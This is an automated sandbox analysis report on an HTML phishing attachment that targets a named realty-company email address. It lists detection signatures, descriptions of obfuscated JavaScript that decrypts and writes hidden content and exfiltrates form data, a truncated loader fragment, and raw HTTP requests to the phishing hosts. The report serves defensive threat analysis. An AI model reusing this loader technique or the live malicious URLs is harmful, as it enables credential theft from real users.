Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Danellarealty 1052.html

Overview

General Information

Sample name:Danellarealty 1052.html
Analysis ID:1568716
MD5:5ea8a9a17e0eeca035eeafcf2dfa3f79
SHA1:4271fb199925497afad5b7c1d8d8c57b3df9d291
SHA256:305b20939667be54b8caec73d6822c938d622b6a3af4462b815ba0989ef1fef2
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
HTML file submission requesting Cloudflare captcha challenge
AI detected suspicious Javascript
Detected javascript redirector / loader
Detected suspicious crossdomain redirect
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64
  • chrome.exe (PID: 2844 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Danellarealty 1052.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3336 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1980 --field-trial-handle=1856,i,3809467858696526328,4437196240526535120,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://eukiskknipcxxzuhmrgophxam0nybqm6y9rnsitcacvfzwlsbvd.bfcgpixdwnw.ru/kNNCRuAPpzARwNvUMVngxkKlnBtlOVFKCVBSKRNJNYUETDCIVHZAXTHNFZJHUGPMWRUVXGCTFFWUZPWWUFQXAvira URL Cloud: Label: malware

Phishing

barindex
Source: 0.4.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://h6n.xswpbsmx.ru/9dCP/#T#Mbsalvucci@danella... Multiple high-risk indicators present: 1) Uses atob for obfuscation of URLs and content 2) Contains obfuscated code/URLs 3) Includes anti-debugging measures 4) Uses document.write for DOM manipulation 5) Contains suspicious encoded content that could be malicious payload 6) Attempts to detect and block security tools/debuggers
Source: 1.2..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://karaokebooks.net/res444.php?2-68747470733a... High-risk script demonstrating multiple suspicious behaviors: 1) Loads crypto library for obfuscation, 2) Uses heavily encoded base64 data, 3) Performs AES decryption of obfuscated content, 4) Uses document.write() for dynamic code execution, 5) Variable names appear randomized to avoid detection. Pattern matches known malware behavior of decoding and executing hidden payloads.
Source: 0.1.i.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/Danellarealty%20105... This code exhibits multiple high-risk behaviors: 1) Heavy obfuscation using Unicode characters and binary conversion, 2) Uses Function constructor for dynamic code execution, 3) Uses Proxy object for potential evasion, 4) Contains encoded malicious payload. The code appears designed to hide its true functionality and execute potentially harmful operations.
Source: 0.6.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://h6n.xswpbsmx.ru/9dCP/#T#Mbsalvucci@danella... High-risk script showing multiple suspicious behaviors: 1) Makes requests to a suspicious Russian domain (.ru) with an unusually long hostname, 2) Contains obfuscated/encoded variable names, 3) Performs redirects to OneDrive (potentially for phishing), 4) Uses form data exfiltration through POST requests, 5) Implements Cloudflare Turnstile but appears to use it maliciously. The combination of data collection, suspicious domains, and redirects strongly suggests malicious intent.
Source: 0.5.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://h6n.xswpbsmx.ru/9dCP/#T#Mbsalvucci@danella... Script demonstrates multiple suspicious behaviors: (1) Anti-debugging techniques including detection of webdriver/phantom/Burp Suite, (2) Aggressive prevention of developer tools and inspection through keyboard shortcuts, (3) Prevention of right-click context menu, (4) Obfuscated variable names in the timing detection function, (5) Forced redirect to onedrive.com using debugger detection. While some of these could be legitimate security measures, the combination and implementation suggest potential malicious intent to prevent analysis and force redirects.
Source: Danellarealty 1052.htmlHTTP Parser: Low number of body elements: 0
Source: https://karaokebooks.net/res444.php?2-68747470733a2f2f68366e2e7873777062736d782e72752f396443502f-cloverHTTP Parser: var dbbdstgxsvjvdgiz = document.createelement("script");dbbdstgxsvjvdgiz.setattribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(dbbdstgxsvjvdgiz);dbbdstgxsvjvdgiz.onload=function(){var {a,b,c,d} = json.parse(atob("eyjhijoienhzqvc4xc9yrvwvq0crtvzjk1dhakdzrtdwbmlnykpoanbfxc9nm2s0nvnaqms3cdncl3zfzlb1ctzuwlu1mm5zqkj6r0vvthdwv21et2qxazdqcgnovetpuuvatkezm0jvegsrvddzs0tkbedjwkroyxv5r1mwohjawmrqqwnut21zbfbcwhrjaveymvngnddkrejcndfibenjrwfqswttnhe4a25mamp6afvtt2zqekzcl0w2zepqdmzyu0jza2fymep0rhpgu3ljcxbmcnvnbjbmv1h1wji1uurwcuhobxfuqwhmue4ycda4yzf1cdbiq3pwu1hgm2m5dtf6q2xmk3c4mlwva2xnqzblrvrlmknqekxukznnzvn4rvvrejflc0zxtdjzwe9injg5zdjcl2dcm2y0vgdtk05kaxzjnhfemlneeun0u0ppejlzbknlvtkxqmq0t2lmdvq1t1gwmwt2c2xwm1ewqxhxs0jxtxhlzu1wnur2n1fxkzdktnryunnia05sehbcl0thcdvhxc9hskhfqjbsynbboupheithmnk3v0tvuvjvu3k1bguxmmtenit3qw1fqmtvsfrpmfk5vzrkmctoy1ftqjdrcdv0tffodeqyohl5ruuzemvnuwpfwkvbdey2vnlwtulpb2tsv2zqv1dhzlz3u0lbxc9aeu1xblwvzefcxc93dgvuszhycwfvau1fy3e5tejcl3...
Source: Danellarealty 1052.htmlHTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Danellarealty%201052.htmlHTTP Parser: No favicon
Source: https://h6n.xswpbsmx.ru/9dCP/#T#Mbsalvucci@danellarealty.comHTTP Parser: No favicon
Source: https://h6n.xswpbsmx.ru/9dCP/#T#Mbsalvucci@danellarealty.comHTTP Parser: No favicon
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: onedrive.live.com to https://www.microsoft.com/microsoft-365/onedrive/online-cloud-storage
Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
Source: Joe Sandbox ViewIP Address: 13.107.139.11 13.107.139.11
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /res444.php?2-68747470733a2f2f68366e2e7873777062736d782e72752f396443502f-clover HTTP/1.1Host: karaokebooks.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /res444.php?2-68747470733a2f2f68366e2e7873777062736d782e72752f396443502f-clover HTTP/1.1Host: karaokebooks.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /9dCP/ HTTP/1.1Host: h6n.xswpbsmx.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://h6n.xswpbsmx.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://h6n.xswpbsmx.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://h6n.xswpbsmx.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/a6e12e96a2d5/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://h6n.xswpbsmx.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/a6e12e96a2d5/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/15pl4/0x4AAAAAAA0qpC5c45_RMlWM/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://h6n.xswpbsmx.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8ece78d77fea8c95&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/15pl4/0x4AAAAAAA0qpC5c45_RMlWM/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/15pl4/0x4AAAAAAA0qpC5c45_RMlWM/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: h6n.xswpbsmx.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://h6n.xswpbsmx.ru/9dCP/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkNEZVg2aXVlRE03K1ZlZ2l4V2hzWEE9PSIsInZhbHVlIjoiUDNOb0Fya1kwNjdVV0xqZHNrUmFuMUY4RTAxM09id0pRZ2ZJS0NBRmJVN3dxYTQzQ2c1Y0YrZUdlRzNSWHhYZ01TNVYyZ1hWUjYvSDY5bkh6WVdpazhNRVcrYkRpckUvOWdFY3FiWU1rcGtlSG5mMG9qZmdyN1BScFVVTkxXNmUiLCJtYWMiOiI1MDY2MDUwMmNlNjQxNzRkYjk5MjU5ZTcxNmYwODY0MjBkNTdiZDkyZmMzMTE5OGIxZjZiYTYyYmUxMWU3YjZhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImxpYWV1eEdrM2QwVDJ4MGVhczgwWkE9PSIsInZhbHVlIjoiQityVU4ySkpoTHJQNmkrS1Uvb1pHd09yN2JjaGlvRmxreVkrYUVMQ0dQR3RzTTE3Z0oyNjdEWlQ2aUMzMmdUcWZYNms5ZXFzdGQwczJrL1hGdnpQanZrTmVDQVNDSGZBM1lVbTh4VHlIMVBCOTFXektQaXhFQ3FQdExXdEpRUFYiLCJtYWMiOiIwYTg2ZmQ2Mjc3NWRhOTcyYmY0Y2MyMzlhMjMxY2QzZmFlNjhiYTMwMmE2NTczYmYwYmIzMTBiODI2YzkwZTJjIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8ece78d77fea8c95&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1622837158:1733341834:Dc9KQflSkPZkmMEtyak2vrZSKicoXy7NaQkbVZnHHyQ/8ece78d77fea8c95/vYfNl33Oh6QHrtE.EMiOKVI5WsVZz.L4qQJn_Uj7HoA-1733343363-1.1.1.1-Vr3hLzRGqU62Jd1H5QGtItUYdGf_SlbwjkhOjzwmkcw7gVZlmEAg7_s.Fi.hyiaX HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8ece78d77fea8c95/1733343368097/Zbvu0NF-cP9MNpr HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/15pl4/0x4AAAAAAA0qpC5c45_RMlWM/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8ece78d77fea8c95/1733343368097/Zbvu0NF-cP9MNpr HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8ece78d77fea8c95/1733343368101/882d612e592359885fa563a9ad67aa19862c0cf04f8be5a8bd6e3205384a9319/89oKHm0hcVr6gQ_ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/15pl4/0x4AAAAAAA0qpC5c45_RMlWM/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1622837158:1733341834:Dc9KQflSkPZkmMEtyak2vrZSKicoXy7NaQkbVZnHHyQ/8ece78d77fea8c95/vYfNl33Oh6QHrtE.EMiOKVI5WsVZz.L4qQJn_Uj7HoA-1733343363-1.1.1.1-Vr3hLzRGqU62Jd1H5QGtItUYdGf_SlbwjkhOjzwmkcw7gVZlmEAg7_s.Fi.hyiaX HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1622837158:1733341834:Dc9KQflSkPZkmMEtyak2vrZSKicoXy7NaQkbVZnHHyQ/8ece78d77fea8c95/vYfNl33Oh6QHrtE.EMiOKVI5WsVZz.L4qQJn_Uj7HoA-1733343363-1.1.1.1-Vr3hLzRGqU62Jd1H5QGtItUYdGf_SlbwjkhOjzwmkcw7gVZlmEAg7_s.Fi.hyiaX HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /kNNCRuAPpzARwNvUMVngxkKlnBtlOVFKCVBSKRNJNYUETDCIVHZAXTHNFZJHUGPMWRUVXGCTFFWUZPWWUFQX HTTP/1.1Host: eukiskknipcxxzuhmrgophxam0nybqm6y9rnsitcacvfzwlsbvd.bfcgpixdwnw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://h6n.xswpbsmx.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://h6n.xswpbsmx.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /kNNCRuAPpzARwNvUMVngxkKlnBtlOVFKCVBSKRNJNYUETDCIVHZAXTHNFZJHUGPMWRUVXGCTFFWUZPWWUFQX HTTP/1.1Host: eukiskknipcxxzuhmrgophxam0nybqm6y9rnsitcacvfzwlsbvd.bfcgpixdwnw.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
